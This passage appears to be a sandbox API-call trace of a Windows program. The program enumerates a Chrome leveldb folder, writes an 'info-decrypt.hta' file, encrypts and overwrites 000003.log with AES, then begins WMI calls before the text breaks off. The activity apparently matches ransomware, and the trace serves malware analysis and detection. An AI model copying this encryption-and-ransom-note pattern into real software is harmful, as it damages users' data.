GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\", nBufferLength=0x105, lpBuffer=0x949e668, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\", lpFilePart=0x0) returned 0x69 [0195.245] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\*", lpFindFileData=0x949e8b4 | out: lpFindFileData=0x949e8b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x802d66a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80916060, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x80916060, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fb10 [0195.246] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x802d66a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80916060, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x80916060, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0195.247] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80916060, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80916060, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x80916060, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="000003.log", cAlternateFileName="")) returned 1 [0195.247] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x802d66a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x802d66a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x804795c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x10, dwReserved0=0x0, dwReserved1=0x0, cFileName="CURRENT", cAlternateFileName="")) returned 1 [0195.247] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x802d66a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x802d66a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x802d66a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LOCK", cAlternateFileName="")) returned 1 [0195.247] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x802d66a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x802d66a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9ab9e110, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xa7, dwReserved0=0x0, dwReserved1=0x0, cFileName="LOG", cAlternateFileName="")) returned 1 [0195.247] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x802d66a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x802d66a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x802d66a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x29, dwReserved0=0x0, dwReserved1=0x0, cFileName="MANIFEST-000001", cAlternateFileName="MANIFE~1")) returned 1 [0195.247] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0195.247] FindClose (in: hFindFile=0xb7fb10 | out: hFindFile=0xb7fb10) returned 1 [0195.248] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb4c) returned 1 [0195.248] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb58) returned 1 [0195.248] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eb8c) returned 1 [0195.248] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb", nBufferLength=0x105, lpBuffer=0x949e694, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb", lpFilePart=0x0) returned 0x68 [0195.249] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\", nBufferLength=0x105, lpBuffer=0x949e668, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\", lpFilePart=0x0) returned 0x69 [0195.249] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\*", lpFindFileData=0x949e8b4 | out: lpFindFileData=0x949e8b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x802d66a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80916060, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x80916060, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fb10 [0195.249] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x802d66a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80916060, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x80916060, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0195.249] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80916060, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80916060, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x80916060, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="000003.log", cAlternateFileName="")) returned 1 [0195.249] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x802d66a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x802d66a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x804795c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x10, dwReserved0=0x0, dwReserved1=0x0, cFileName="CURRENT", cAlternateFileName="")) returned 1 [0195.249] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x802d66a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x802d66a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x802d66a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LOCK", cAlternateFileName="")) returned 1 [0195.250] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x802d66a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x802d66a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9ab9e110, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xa7, dwReserved0=0x0, dwReserved1=0x0, cFileName="LOG", cAlternateFileName="")) returned 1 [0195.250] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x802d66a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x802d66a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x802d66a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x29, dwReserved0=0x0, dwReserved1=0x0, cFileName="MANIFEST-000001", cAlternateFileName="MANIFE~1")) returned 1 [0195.250] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x802d66a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x802d66a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x802d66a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x29, dwReserved0=0x0, dwReserved1=0x0, cFileName="MANIFEST-000001", cAlternateFileName="MANIFE~1")) returned 0 [0195.250] FindClose (in: hFindFile=0xb7fb10 | out: hFindFile=0xb7fb10) returned 1 [0195.250] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb4c) returned 1 [0195.250] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb58) returned 1 [0195.250] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log", nBufferLength=0x105, lpBuffer=0x949e600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log", lpFilePart=0x0) returned 0x73 [0195.250] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e608, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\info-decrypt.hta", lpFilePart=0x0) returned 0x79 [0195.250] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea68) returned 1 [0195.250] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x949eae4 | out: lpFileInformation=0x949eae4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0195.251] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea64) returned 1 [0195.251] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log", nBufferLength=0x105, lpBuffer=0x949e600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log", lpFilePart=0x0) returned 0x73 [0195.251] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e4a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\info-decrypt.hta", lpFilePart=0x0) returned 0x79 [0195.251] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e99c) returned 1 [0195.252] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x4a8 [0195.252] GetFileType (hFile=0x4a8) returned 0x1 [0195.252] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e998) returned 1 [0195.252] GetFileType (hFile=0x4a8) returned 0x1 [0195.252] WriteFile (in: hFile=0x4a8, lpBuffer=0x3ab1120*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x949ea60, lpOverlapped=0x0 | out: lpBuffer=0x3ab1120*, lpNumberOfBytesWritten=0x949ea60*=0x1000, lpOverlapped=0x0) returned 1 [0195.253] WriteFile (in: hFile=0x4a8, lpBuffer=0x3ab1120*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x949ea34, lpOverlapped=0x0 | out: lpBuffer=0x3ab1120*, lpNumberOfBytesWritten=0x949ea34*=0x55e, lpOverlapped=0x0) returned 1 [0195.254] CloseHandle (hObject=0x4a8) returned 1 [0195.254] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log", nBufferLength=0x105, lpBuffer=0x949e608, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log", lpFilePart=0x0) returned 0x73 [0195.254] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eab4) returned 1 [0195.254] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\000003.log"), fInfoLevelId=0x0, lpFileInformation=0x3ab213c | out: lpFileInformation=0x3ab213c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80916060, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80916060, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x80916060, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0195.255] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eab0) returned 1 [0195.255] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log", nBufferLength=0x105, lpBuffer=0x949e4f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log", lpFilePart=0x0) returned 0x73 [0195.255] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e9e8) returned 1 [0195.255] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\000003.log"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4a8 [0195.255] GetFileType (hFile=0x4a8) returned 0x1 [0195.255] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e9e4) returned 1 [0195.255] GetFileType (hFile=0x4a8) returned 0x1 [0195.255] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x949eaf0 | out: lpFileSizeHigh=0x949eaf0*=0x0) returned 0x0 [0195.255] CloseHandle (hObject=0x4a8) returned 1 [0195.256] CryptAcquireContextW (in: phProv=0x949ea3c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x949ea3c*=0x66bbb70) returned 1 [0195.256] CryptGenRandom (in: hProv=0x66bbb70, dwLen=0x10, pbBuffer=0x3ab2750 | out: pbBuffer=0x3ab2750) returned 1 [0195.803] CryptImportKey (in: hProv=0x66bbb70, pbData=0x37db8bc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x949ea0c | out: phKey=0x949ea0c*=0xb7f250) returned 1 [0195.803] CryptContextAddRef (hProv=0x66bbb70, pdwReserved=0x0, dwFlags=0x0) returned 1 [0195.803] CryptContextAddRef (hProv=0x66bbb70, pdwReserved=0x0, dwFlags=0x0) returned 1 [0195.804] CryptDuplicateKey (in: hKey=0xb7f250, pdwReserved=0x0, dwFlags=0x0, phKey=0x949e9fc | out: phKey=0x949e9fc*=0xb7f5d0) returned 1 [0195.804] CryptContextAddRef (hProv=0x66bbb70, pdwReserved=0x0, dwFlags=0x0) returned 1 [0195.804] CryptSetKeyParam (hKey=0xb7f5d0, dwParam=0x4, pbData=0x37db99c*=0x1, dwFlags=0x0) returned 1 [0195.804] CryptSetKeyParam (hKey=0xb7f5d0, dwParam=0x1, pbData=0x37db968, dwFlags=0x0) returned 1 [0195.804] CryptEncrypt (in: hKey=0xb7f5d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37db9ac*, pdwDataLen=0x949ea68*=0x10, dwBufLen=0x10 | out: pbData=0x37db9ac*, pdwDataLen=0x949ea68*=0x10) returned 1 [0195.804] CryptEncrypt (in: hKey=0xb7f5d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37db9e0*, pdwDataLen=0x949ea70*=0x0, dwBufLen=0x10 | out: pbData=0x37db9e0*, pdwDataLen=0x949ea70*=0x10) returned 1 [0195.805] CryptDestroyKey (hKey=0xb7f250) returned 1 [0195.805] CryptReleaseContext (hProv=0x66bbb70, dwFlags=0x0) returned 1 [0195.805] CryptReleaseContext (hProv=0x66bbb70, dwFlags=0x0) returned 1 [0195.805] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log", nBufferLength=0x105, lpBuffer=0x949e4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log", lpFilePart=0x0) returned 0x73 [0195.805] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e9d4) returned 1 [0195.805] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\000003.log"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4e0 [0195.806] GetFileType (hFile=0x4e0) returned 0x1 [0195.806] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e9d0) returned 1 [0195.806] GetFileType (hFile=0x4e0) returned 0x1 [0195.806] WriteFile (in: hFile=0x4e0, lpBuffer=0x37dc05c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x949ea64, lpOverlapped=0x0 | out: lpBuffer=0x37dc05c*, lpNumberOfBytesWritten=0x949ea64*=0x20, lpOverlapped=0x0) returned 1 [0195.807] CloseHandle (hObject=0x4e0) returned 1 [0195.807] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0195.807] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0195.807] CoTaskMemFree (pv=0xbed438) [0195.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x949e4c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0195.807] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949ea10 | out: ppv=0x949ea10*=0xb51e34) returned 0x0 [0195.807] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949ea08 | out: pAptType=0x949ea08*=1) returned 0x0 [0195.807] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949ea0c | out: ppvObject=0x949ea0c*=0x0) returned 0x80004002 [0195.807] IUnknown:Release (This=0xb51e34) returned 0x1 [0195.808] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e378 | out: ppv=0x949e378*=0x6027690) returned 0x0 [0195.808] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027690, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e590 | out: ppvObject=0x949e590*=0x0) returned 0x80004002 [0195.809] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027690, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e5a4 | out: ppvObject=0x949e5a4*=0x60312e0) returned 0x0 [0195.809] WbemDefPath:IUnknown:Release (This=0x6027690) returned 0x0 [0195.809] WbemDefPath:IUnknown:QueryInterface (in: This=0x60312e0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e1c4 | out: ppvObject=0x949e1c4*=0x60312e0) returned 0x0 [0195.809] WbemDefPath:IUnknown:QueryInterface (in: This=0x60312e0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e180 | out: ppvObject=0x949e180*=0x0) returned 0x80004002 [0195.809] WbemDefPath:IUnknown:AddRef (This=0x60312e0) returned 0x3 [0195.809] WbemDefPath:IUnknown:QueryInterface (in: This=0x60312e0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dadc | out: ppvObject=0x949dadc*=0x0) returned 0x80004002 [0195.809] WbemDefPath:IUnknown:QueryInterface (in: This=0x60312e0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949da8c | out: ppvObject=0x949da8c*=0x0) returned 0x80004002 [0195.809] WbemDefPath:IUnknown:QueryInterface (in: This=0x60312e0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949da98 | out: ppvObject=0x949da98*=0xbe24a0) returned 0x0 [0195.809] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe24a0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949daa0 | out: pCid=0x949daa0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0195.809] WbemDefPath:IUnknown:Release (This=0xbe24a0) returned 0x3 [0195.809] CoGetContextToken (in: pToken=0x949daf8 | out: pToken=0x949daf8) returned 0x0 [0195.809] CoGetContextToken (in: pToken=0x949df00 | out: pToken=0x949df00) returned 0x0 [0195.809] WbemDefPath:IUnknown:QueryInterface (in: This=0x60312e0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, 